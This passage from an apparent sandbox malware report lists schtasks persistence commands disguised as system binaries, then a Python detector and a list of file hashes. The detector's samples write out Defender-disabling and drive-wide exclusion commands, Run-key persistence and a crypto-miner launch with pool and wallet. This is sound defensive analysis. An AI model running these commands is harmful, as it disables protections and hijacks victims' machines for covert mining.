  Command line: schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Pictures\Saved Pictures\firefox.exe'" /rl HIGHEST /f
  PID: 6332
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Searches\msedge.exe'" /f
  PID: 4292
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Users\Admin\Searches\msedge.exe'" /rl HIGHEST /f
  PID: 6692
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Searches\msedge.exe'" /rl HIGHEST /f
  PID: 3528
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\DriverHostCrtNet\dllhost.exe'" /f
  PID: 5192
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\DriverHostCrtNet\dllhost.exe'" /rl HIGHEST /f
  PID: 5260
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\DriverHostCrtNet\dllhost.exe'" /rl HIGHEST /f
  PID: 6608
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\DriverHostCrtNet\conhost.exe'" /f
  PID: 6644
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\DriverHostCrtNet\conhost.exe'" /rl HIGHEST /f
  PID: 6720
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\DriverHostCrtNet\conhost.exe'" /rl HIGHEST /f
  PID: 5600
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "vbcv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\vbc.exe'" /f
  PID: 5732
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "vbc" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\vbc.exe'" /rl HIGHEST /f
  PID: 5680
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "vbcv" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\vbc.exe'" /rl HIGHEST /f
  PID: 5184
  - Process spawned unexpected child process
  - Creates scheduled task(s)
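As an added example (not part of the sandbox report and not the malware's own code), the Python script below decodes the `-enc` payload seen in the tree and runs coarse detection logic over command lines copied from it: Defender exclusions and disable switches, schtasks and Run-key persistence (with a masquerade check for task targets that carry a system or browser binary name outside its normal directory), and the XMRig-style miner launch. The regexes, category names and the allowed-directory table are this example's own assumptions; the sample command lines are copied from the process tree, except the last, which is an excerpt of the script executer.exe echoes into test.ps1.

```python
from __future__ import annotations
import base64
import re
from dataclasses import dataclass, field

# Regexes and the directory table are this example's own heuristics, not sandbox signatures.
ENC_RE = re.compile(r"(?i)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
EXCL_RE = re.compile(r"(?i)-Exclusion(Path|Process|Extension)\s+(.+?)"
                     r"(?=\s*(?:;|$|-ErrorAction|Add-MpPreference))")
DISABLE_RE = re.compile(r"(?i)Set-MpPreference\s+-(Disable\w+)\s+(?:1|\$true)")
SERVICE_RE = re.compile(r"(?i)Services\\(WinDefend|WdNisSvc|Sense|WdNisDrv|WdFilter|WdBoot)")
SCHTASKS_RE = re.compile(r"(?i)\bschtasks(?:\.exe)?\s+/create\b")
RUNKEY_RE = re.compile(r'(?i)\breg(?:\.exe)?\s+add\s+"?(HK[^"\s]*\\Run)"?\s+/v\s+(\S+).*?/d\s+"([^"]+)"')
MINER_RE = re.compile(r"(?i)\s-o\s+([\w.-]+):(\d+)\s+-u\s+(\S+)")

# Assumed table of where these binaries legitimately live; a task pointing one of these names anywhere else is a masquerade.
EXPECTED_DIRS = {
    "csrss.exe": ("c:\\windows\\system32",),
    "conhost.exe": ("c:\\windows\\system32",),
    "dllhost.exe": ("c:\\windows\\system32", "c:\\windows\\syswow64"),
    "msedge.exe": ("c:\\program files", "c:\\program files (x86)"),
}

@dataclass
class Finding:
    category: str
    detail: dict = field(default_factory=dict)

def decode_encoded_command(cmdline: str) -> str | None:
    """Return the UTF-16LE text behind a PowerShell -enc argument, or None."""
    m = ENC_RE.search(cmdline)
    if m is None:
        return None
    b64 = m.group(1)
    return base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("utf-16-le")

def parse_schtasks(cmdline: str) -> dict:
    """Extract /tn, /mo, /tr and /rl from a schtasks /create command line."""
    def opt(flag: str) -> str | None:
        m = re.search(rf'(?i)/{flag}\s+(?:"([^"]*)"|(\S+))', cmdline)
        return m and next(g for g in m.groups() if g is not None)
    target = (opt("tr") or "").strip("'")  # the sandbox renders /tr "'path'"
    allowed = EXPECTED_DIRS.get(target.rsplit("\\", 1)[-1].lower())
    return {
        "task": opt("tn"),
        "every_minutes": int(opt("mo")) if opt("mo") else None,
        "target": target,
        "highest": bool(re.search(r"(?i)/rl\s+highest", cmdline)),
        "masquerade": allowed is not None and not target.lower().startswith(allowed),
    }

def classify(cmdline: str) -> list[Finding]:
    """Classify one command line; a decoded -enc payload is scanned as well."""
    findings: list[Finding] = []
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append(Finding("powershell_encoded_command", {"decoded": decoded}))
        text = f"{cmdline} {decoded}"
    exclusions = []
    for kind, raw in EXCL_RE.findall(text):  # unwrap quotes and @('C:\','D:\') arrays
        for value in re.split(r"['\"]\s*,\s*['\"]", raw.strip("\"'@() ")):
            exclusions.append((kind.lower(), value))
    if exclusions:
        findings.append(Finding("defender_exclusion", {"exclusions": exclusions}))
    settings = DISABLE_RE.findall(text)
    services = sorted({s.lower() for s in SERVICE_RE.findall(text)})
    if settings or services:
        findings.append(Finding("defender_disable", {"settings": settings, "services": services}))
    if SCHTASKS_RE.search(text):
        findings.append(Finding("schtasks_persistence", parse_schtasks(text)))
    if m := RUNKEY_RE.search(text):
        findings.append(Finding("runkey_persistence",
                                {"key": m.group(1), "value": m.group(2), "target": m.group(3)}))
    if m := MINER_RE.search(text):
        algo = re.search(r"(?i)\s-a\s+(\S+)", text)
        findings.append(Finding("miner", {"pool": m.group(1), "port": int(m.group(2)),
                                          "wallet": m.group(3), "algo": algo and algo.group(1)}))
    return findings

# Constructed sample: command lines copied from the process tree above; the last one is an excerpt of test.ps1.
SAMPLE_CMDLINES = [
    "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc "
    "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA",
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')''',
    r'"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"',
    r'''schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Windows\Downloaded Program Files\csrss.exe'" /f''',
    r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f',
    r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl",
    r'Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4',
]

if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        for f in classify(cmd):
            print(f"{f.category:27} {f.detail}")
```

Running it prints one line per finding. The `-enc` payload decodes to two Add-MpPreference calls that exclude C:\Users\Admin\AppData\Local and the process name AttributeString.exe, which matches the dropped binary at C:\Users\Admin\AppData\Local\TypeId\uaryavp\AttributeString.exe in the tree; the csrss task is flagged because csrss.exe is scheduled from C:\Windows\Downloaded Program Files rather than System32.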
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Hide Artifacts (1): Hidden Files and Directories (1)
- Impair Defenses (1): Disable or Modify Tools (1)
- Modify Registry (3)
- Scripting (1)
- Virtualization/Sandbox Evasion (2)
Downloads
- Filesize: 5.0MB
  MD5: a3fb2b623f4490ae1979fea68cfe36d6
  SHA1: 34bec167e0f95ecc36761f77c93c1229c2c5d1f4
  SHA256: 3bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56
  SHA512: 370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912
- Filesize: 474KB
  MD5: 84e9564e7851431a15907c50542f121e
  SHA1: 00e3d11e5e45c0cc9d211da0548c6cd15f676c72
  SHA256: 5dc06ba4b0a7cbcb93c274c56daebe30ae498efd991abe381b85f2d1bf84b133
  SHA512: 4770fa4e5143386c07fcdf7c3be2726e9ee21459cb2824b2852d28c164fe838a38baab49dd6ba6b659ac175f330dffcc4c105f3fac77f8d43946f92d808da609
- Filesize: 660KB
  MD5: 5aca94c44afda53a635da48fff4abc4e
  SHA1: 24ff9445afe164648005aa9d70db0a55f0b6d1ab
  SHA256: ed8986caa81e13a405480929c08cc28cc44f43ea04b930880b05fde22a12b7e7
  SHA512: e3907f22da64d0503fce9914219d1f16cdf90ec737f62124c71f5146529eea3181d19b1c21cf94e58396caf0a6b2be572e3ea2cf3dadcced037cbb51ba52703b
- Filesize: 1KB
  MD5: e3da8eae01f57153845d1533b6bed268
  SHA1: a235712a631c52d2853e9136d9c4431358f34fd2
  SHA256: 77507c05c8131f73d1dd1500992223819a6ab09cd820716e00bf907c9c7fc857
  SHA512: b24b1064f8270981746f49a1b56a1aab21f7985af672bc6dcdbd67e498033714131ba4581c9c3d934e86b56d904bb0ecf322fae498133bbb9cb3a68ea6cad9d5
- Filesize: 2KB
  MD5: d85ba6ff808d9e5444a4b369f5bc2730
  SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
- Filesize: 927B
  MD5: 4a911455784f74e368a4c2c7876d76f4
  SHA1: a1700a0849ffb4f26671eb76da2489946b821c34
  SHA256: 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c
  SHA512: 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d
- Filesize: 150B
  MD5: a76998cb919320a0f0effab695d108e7
  SHA1: e683ff4586b9ff0f4af3b1796007691e111e5a0b
  SHA256: 0b04dde9cae0b6952ea31561ca00bebef9102d9363b0618a2e6bceb21b201165
  SHA512: 6b1608d5457a756e35a9ee58b77900afb363113ab9f75c8a0bb48781d84c579a2f1bca97c7f762102c1be103a1fc4fa0dee0bb3e51f5e44f632f99c78a221255
- Filesize: 284B
  MD5: 908e381d47861b0f9d20e8c9ddf9b1c2
  SHA1: 5e7e8be00b92c2006993d184c4d7be51f09d6d22
  SHA256: 1ddc5bccc605e0f54716c96d91f2902e0e96578e931bc1d9fce51d34358d00d6
  SHA512: 613a266e43ffb7530fe0e4d0eb65c7f9c90ad74cc4d13b21d2f5270acceb0b2d88f10607c3b192b3122f88b9da9175594370241dbf02474aa3808fad2c7e23c1
- Filesize: 418B
  MD5: a387d7bb8ad7b1ee724ce7e9c8577be7
  SHA1: 4a8f456da4fec6cbf9604b606fde33ba484c537c
  SHA256: 6a64d0af07c4031adbb007687cab8cd26aaeb67593aa573a941fb9410d95b5cb
  SHA512: 1e93798fb52d8b1cdeda805c51b222432ebd8467eef9bebe72dd3785026d7d99857db908e77cd9f9c36d1230d999bd4f466c6614dd6bad94fc4a5d0e326022a4
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\a9408091-ed19-44be-84f5-9eefab27740a.dmp
  Filesize: 6.1MB
  MD5: f27ecdc74b438dbc2b2089c354bf97a3
  SHA1: 01668aecf3a414ad1e86ac0216eced8481e0c003
  SHA256: 3230ae9f7cce4287a9514a042b5110363c42c3faae2ce6b671ca2626916bc29b
  SHA512: a58a24074f58b2436f813890af625db48f38fa6305bf0607f5eff5fc3dfc30705205b0310ac71c966f822d494e206013456144846bca4c605b6bce039febc67a
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\f261dfe2-8619-4a92-a8b6-1f07a99c0ebc.dmp
  Filesize: 80KB
  MD5: edb639fe8083ae5323e0eb244e215ac2
  SHA1: c49b67a101d23aa60d6ae5943f45d30455f0c7c0
  SHA256: d28c4783735fe607baaa45735c2f27d46a7131e98c8717d0068c9bc4b40c8ae3
  SHA512: 89eeb80a83a9005a976e6944fce3540ad344be2f32690f64d89753ee4c96e078767342ea31c1322caa201193e3c16f80a44e4292eb7efe93e11d18cf36ec8966
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\ffb20684-b64a-49a7-a2e9-56a2fe23065e.dmp
  Filesize: 159KB
  MD5: eb85d35dd3feddacc0c94f113b9cd08f
  SHA1: b3d851c9a7ac09807307a1a0558a861a2fc1ba18
  SHA256: 16da8acbd4c4760d171b8588ba353339db95a33eddd707d0394941161331ae6e
  SHA512: 24b41e2ba53c36cd6fde8f612ad5b885875fcd16f78682a3991da1f701eeae6f5688e32993eb384c8d7b89ad44c82f5567db8ed12a294f7e67dc4d76823320d4
- Filesize: 152B
  MD5: bcaf436ee5fed204f08c14d7517436eb
  SHA1: 637817252f1e2ab00275cd5b5a285a22980295ff
  SHA256: de776d807ae7f2e809af69746f85ea99e0771bbdaaed78a764a6035dabe7f120
  SHA512: 7e6cf2fdffdcf444f6ef4a50a6f9ef1dfb853301467e3f4784c9ee905c3bf159dc3ee9145d77dbf72637d5b99242525eb951b91c020e5f4e5cfcfd965443258c
- Filesize: 152B
  MD5: e559f29d5380b70053cc0401b870700c
  SHA1: a4e63f70ab67bda1fb8728ec00af82d8946867b1
  SHA256: db94ce5b4ee301744d3167461a2f83f9d794ad531abd7e3530dee2322e3b4616
  SHA512: ec6f4fbf14a4113b916f90526d656325964597d8045fe8dc99f14296c7e52b0227a38d7ca3a763aa10d2de7dfc12922903b7ca8e8ea263ed89e2f04b45590af6
- Filesize: 111B
  MD5: 285252a2f6327d41eab203dc2f402c67
  SHA1: acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
  SHA256: 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
  SHA512: 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
- Filesize: 2KB
  MD5: 2f27eb0b5a2abbae62c0918d44f25b29
  SHA1: 7e291debbbf2ea53a22568800ea0150d4ea71d5a
  SHA256: f34867b2f8986841bbe210d83b7f84475091bec41d43c6895f51d99997c37e93
  SHA512: c0b4cf043cf68e1804c3e30f2e64ffd62a9f2a6b23dbd2886023958cb1031d509c5a0cca78e44706d8444f893c2660274b3730e41d66c2ad271be350a26dc2a7
- Filesize: 2KB
  MD5: d8caf79e6d813ff86252813186236771
  SHA1: a547550f8a9445f2170bc98e39ce2e2caab4998f
  SHA256: 7b5c1f386ff4def29d79e0fa3b3c0c268c6792572554f941885ff54e9e6fb51a
  SHA512: 2527d1445edb0a5354ccfe1539eb7c08dbb0766d1fb051cb66465601c1824d1182d755f514304987fc22f615d9c172c5a847e32aa7f7a8331175634581ab4418
- Filesize: 2KB
  MD5: bc53fc0c5fa83e057c58f5f6fe958a6b
  SHA1: f9fd9345052e1543aec23fce96ca17c8bc6fc56d
  SHA256: 62ff2a676ba26045a068c5212cc1a19b1169db80bf4a86a205d2909ca25c7eab
  SHA512: 9cc9cfd3ba94e2eb0791fbb179c27ed9f9dd0498d1f65ee8bcecd537c47383fb36f66c7b4cd3ae1ab411b3bbdf12f511c29829e1419c32131c9de681c34f1c36
- Filesize: 2KB
  MD5: 65373e7f0aa9f29a63074065c7032773
  SHA1: eda2553b5dc871f2c559e52bcf14eb1738261514
  SHA256: 378201ffa9622e1e75c9ff7dbce4888e3a109ec6ed79d21f966a50d0801fe213
  SHA512: d97a540ba61b208709947782c9a768d4773e931e19899fbdf5200342077f183e65f8a31a084545166274600dffa0ca5901d158a6eeaef20ed5c47d73ffc6a16e
- Filesize: 2KB
  MD5: e4de99c1795fd54aa87da05fa39c199c
  SHA1: dfaaac2de1490fae01104f0a6853a9d8fe39a9d7
  SHA256: 23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457
  SHA512: 796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926
- Filesize: 944B
  MD5: 935ec949409de8d6fa665f61908fc5e7
  SHA1: 0869c501c3b9526f49897a3d83b7081b16f84aa8
  SHA256: 675ecf0d6384542718638f32cb281528f8c06e89a1159f270699342493d20451
  SHA512: 8680cf22d9eb897513994bb7a77e3ce4733a56150f21f941eaf32f79a238ae80436289f7c6154ca375370f329719351adbc0dcf75e1d57930405863dde44dfc1
- Filesize: 1KB
  MD5: ae6e8b9a371977808acef61b737e9a1a
  SHA1: 178a65f10969c764093b0df1d050d5aa49ea5e6d
  SHA256: 423819c0b1c3f5f9bd5b8f4654ca981c660ac5444a4e5cb80f606059901ab92b
  SHA512: 79c26e94c85c82ab8138bcd7daff5f207392754d719f27e93733dbb4d9a28d680a40ae0b49450e090694ebe99865646e53bb17b69a24d79b903b728f2377830f
- Filesize: 1KB
  MD5: 8eb06951b48b364432a3757eec6bd5af
  SHA1: df0b71da69535d6b846c4fb151756205a94a661e
  SHA256: da759628424de3646d7031abfc03a213b72a8d9a2e2fce1f5c643faf86519c97
  SHA512: 2764e05a7297577eab32263c578ac76acfeccbf019757bc6c94c975af22014f563f180ccda4a12751756b412e269b57ddca1f2b1362c8acaaef7962b6e4edb0c
- Filesize: 944B
  MD5: 2e907f77659a6601fcc408274894da2e
  SHA1: 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
  SHA256: 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
  SHA512: 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
- Filesize: 995KB
  MD5: 0e2720100def20722014a1f655b69c68
  SHA1: c9b65cf2fde81dc43893002d673a5275df5a4be7
  SHA256: 5f7f7a3b1392de564124c93fe59286e757bbb04d6f1f6be1d8846ef65da6271a
  SHA512: 194497213c2c6c237e50bc1fcf950c9f84223363b8dc08b6c5d1c036ce950e55746fc5dd02675d0f64210d8e79da9acaae8911da61f7a82a733bbe87d0e31dce
- Filesize: 741KB
  MD5: a2dcc6c92e99ef7f36fb3e858536d59d
  SHA1: 51f312a696f30738c1b6a49d4e007d3ff7407cd9
  SHA256: 9eada98b6ced146b420afb868cac32e8fac3dea72810fe3dc7097a80e63cd350
  SHA512: d52e4926f512c061211ac551e85379824f6464407634af4d11836c48ed693e961956f987a123a176678f56a623bdf3c117e690519c48c1336305469e3cb13bd4
- Filesize: 627KB
  MD5: 2a1508dfd010467a935c500d8dbb776d
  SHA1: 2d71be723bb86a8421cabb0393c474fdad9a0924
  SHA256: 4054808cfb23d83997508452056086e5788d32dbb0f6fb94655bdac8fadb0ce8
  SHA512: 43e71a0f49c3d5c8cc675ce2fdd7c8eddc0f1925a316ff60570367a8830edf1de2659b351b9a203d2eaf4238ce4715f60a914f1b62bf2345f05c879191bfd599
- Filesize: 874KB
  MD5: 7e0bf8e6f25be040eee737cca3a27dac
  SHA1: 3312e05d3d908effc1271fd0ccc561777bd61bdd
  SHA256: 53617172c7977e75f5537d0f798bc7cc584e2e307ae0c6440e8b71decb0efa92
  SHA512: 495c4ac77bfc6e7eede28ec29693d74394efc7972cb1b999efe95553c65d975654a1011ede23d4c1dad25ade3d5308ca1e88b6dcc770f0697facdca3123718bb
- Filesize: 1.2MB
  MD5: c2682c2b2ed6d0ab253610fda0de4a8a
  SHA1: 3f3f880a30b40565a4e99bdd2e468d09c911009c
  SHA256: 8b893519be0ee2ab7de59ce80fd07491238a504d93e066ad0dc17f56be24ddbf
  SHA512: e2650c9926fd1008d89cab5a7e14f1bb3de2c7133166a081ddf82710d55f979dd64d12c1b382f50d0c3cc67dd8ecae8635d54ffc70003a9be765198ac4c29062
- Filesize: 923KB
  MD5: 1adfe9d45b62494f06fccac17ba7c904
  SHA1: c94abbd9f7d5efd9856ae804220ded2fb8c09b85
  SHA256: 5da906ee06134abdf80193321beab6b8a7919854863b5c024e826f6393d04e55
  SHA512: 3773eb8e12f35fa1830a766b19e7be8b87a9d3e4e7c5dda3de20cb930c2d982d4d28c6dc497f8261711282c35ac743a5a5e9fb7b3a71aed306fb98d75c5ebeba
- Filesize: 974KB
  MD5: 3239641dd250e5139ca0730d7857f26d
  SHA1: 9265a009e6caefb79d1a6163c2999ca79844a58f
  SHA256: 266f629878256a66969588113959e3b891a7283f1cea519764d2956a48468753
  SHA512: 35d4927725334fc2b10a6987b45097848e1f76dd9df4191403f65fa709f49c3e2d1ff48701de9b2aea7f2d5ffd47724b4f3f9583c6c2404b24be303ec8ead9c8
- Filesize: 72KB
  MD5: fb003fc48dbad9290735c9a6601381f7
  SHA1: 49086b4036de3d990d0120697553f686091b2cd9
  SHA256: 9b7110edf32f235d590b8141ba6aa81eb3414e3202ff0feefcb2160e655c0116
  SHA512: 690877ca9798f1b6bbf67199fa55d939428b87888d99e2f730cad4b1aa0d37938622ce265a19fac2e0778237bf6fe1bc0cb773d5f7be5219800ad4a3d850604b
- Filesize: 1KB
  MD5: 42725f864f9fd0034be913e49b2a85b1
  SHA1: c64d14328708cd7d884f825a125bea01b54fa69b
  SHA256: 19d815fe803dbe7113024fe3abfaae6de12b76d49077e161acd5e93b9003d5cd
  SHA512: d584c0b093016377e4e58d7f8071334c608f67f73a67d2c4307d6affe55a236d04043d80f594782749b788999c889d96346f2a73ce920be5e8fd83b07d4d2cab
-
Filesize
247KB
MD55cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
-
Filesize
256KB
MD5d13d2667dee8cb92a50844029d5b2171
SHA15cd1880455e57bb19e8a25bc3b7addab586cd5ab
SHA2561bc1123350ef7f37d25f68b18b7b53054de329046c6b19e27c0303362b1a5ff1
SHA5127c5a0b43dd468472032a4ca90d774bc6d8c4e32a5dea155a6d208347b8ada794afc448212836bba30f784d26729b2f430fbd0c097928e68a3b5d25da700ff6c4
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
578KB
MD59c9b3f88b4a6f0be5596d272c4db4cc2
SHA12bd7fc6b0e960f4f581481216697071c91c0b2e6
SHA256c501a5520a40c78e3561e9df6d8c6e348603eba519bf6b6ca80695a9305ecd1e
SHA512bd3d2d6bbfb9b1d18b908dbd9ed67ae60b9bb8feee74edd38841119695e4547410b4117483cba02ee78617d5181fb43b8c9121d62d5ef5087e86aeefd1b1778e
-
Filesize
851KB
MD554219d3d465f7850ea778ab7aba42027
SHA12f8328cf25ddd3dadbe30e8ae9f254720334dd1b
SHA256bc4b3d18b5ed715fc45c5b6ac79d91beb048d4698bbcd6791191ea8d5885691e
SHA5129506ed3b7d808f0fe3c53612dcdae860a212268d1b48a518b97deb156a7415f233def81f9b29d9137f2d62ced9412008cbf7194e125ca031489042e320cf7f40
-
Filesize
900KB
MD5ded799a82fbb3709eafad54189f0c5d3
SHA105f0c54a6a28822f63ab2c79fdb7890778bcf166
SHA256ab81e717a6ab91ea244e1b1c4a47012fdc01badd2fa3bc90ab241c3fd158a125
SHA512bd89cb522fb9bd0a110133b5fbbc5bba40264ad94bf0c1af11fca94a5dfd6e04a8c5ae32040a66bb5f51e020238abc036df97bcc991880476a63da2c527a0867
-
Filesize
738KB
MD51855450f91443854b623456be15aecc1
SHA1a5cd2dc6e8d11af50ccd6fb37d6d48c34d84cb96
SHA2564643afdc1b2e0f79608dbb77cffcef707a2625a3ed2d0c1b6474a01e16e53520
SHA51216caf9ea8d53dbd6593a2429beadd5a16f2905952d7b2bd4f0421031b0b5ce9ce3743d26abc34c08a8e2b8bd46c933037e137b141cecd973571bea68b10736c4
-
Filesize
444KB
MD5559c9eb6deedc13384060a773f50abd5
SHA1c4f37bec8e7e124536f20c6b8ec93b9154d35258
SHA256865e8b7801b63a7e5c6dc7a035c1b7d734c1d35cb6a04b4e50fc68862699eb74
SHA512080b4fabfe617a5630e296870183e6cc98457b18e653d9ff5dada16fdfffdf1ac14d7fae0a7a2937e704cab2c32e049a4a026b6d6e7eb293f59ba57e86e814c9
-
Filesize
757KB
MD50784e613eb72b68ba8b0a04172148a9f
SHA112a18e490411584b400463074c54a641be57e67e
SHA25630c974e48559aabeb15de3863dcb208c9a72465838138916e90e630f2bc7c0ce
SHA512a1b8eb7a04631dfd3ca06f64bcc73548f712ae89e6f41e3e0b1a489a7f8a1d4426e6651adc961feb4d93406332b8ac5ef8810f4a175e258ee58e368594d29c97
-
Filesize
595KB
MD5716827bb001418f2875824328fd7eac7
SHA15bb65b84cdcb40ac11ac7da327a2d437af82cf99
SHA256b7b8ffae03d4fa1dc68bc4f0ba32a7f24720add3b7ea2e129bdef6bb8d88a51c
SHA51298dd59b128e11d3d085643312e7068ab87754a6147e59b47d68452e216f3bcf9bc9585e268c8466b3b821b7304baac6befc8d94ed7633a2cefe2502c6408194a
-
Filesize
644KB
MD52106767abce9f9f6382eb96048f5f10c
SHA1f3a05342e80fbc5919d8f913b68fdfc5d4113950
SHA25610580ea38e2a241a0cf1ba5aed36cbaf912991ba5f04ad543c23707d796eebd1
SHA512886ef461a71314917f59a09f82d9c49f99ea02ca5d3511d8837b8c1a31178e18fbf1e0c5ea100419193a4ddca15106708c26ce70a2eb4fda9da6df950aec58f4
-
Filesize
2.0MB
MD52d63112893ec4a3142f4f0b1f16f56db
SHA1108a292cf6ea50e137a192aae121a8c6bd4c20dc
SHA256294a15b8d5df132b50a68c5ac19a6c7aafc8b051983a28e7bf182bff6aa2ef15
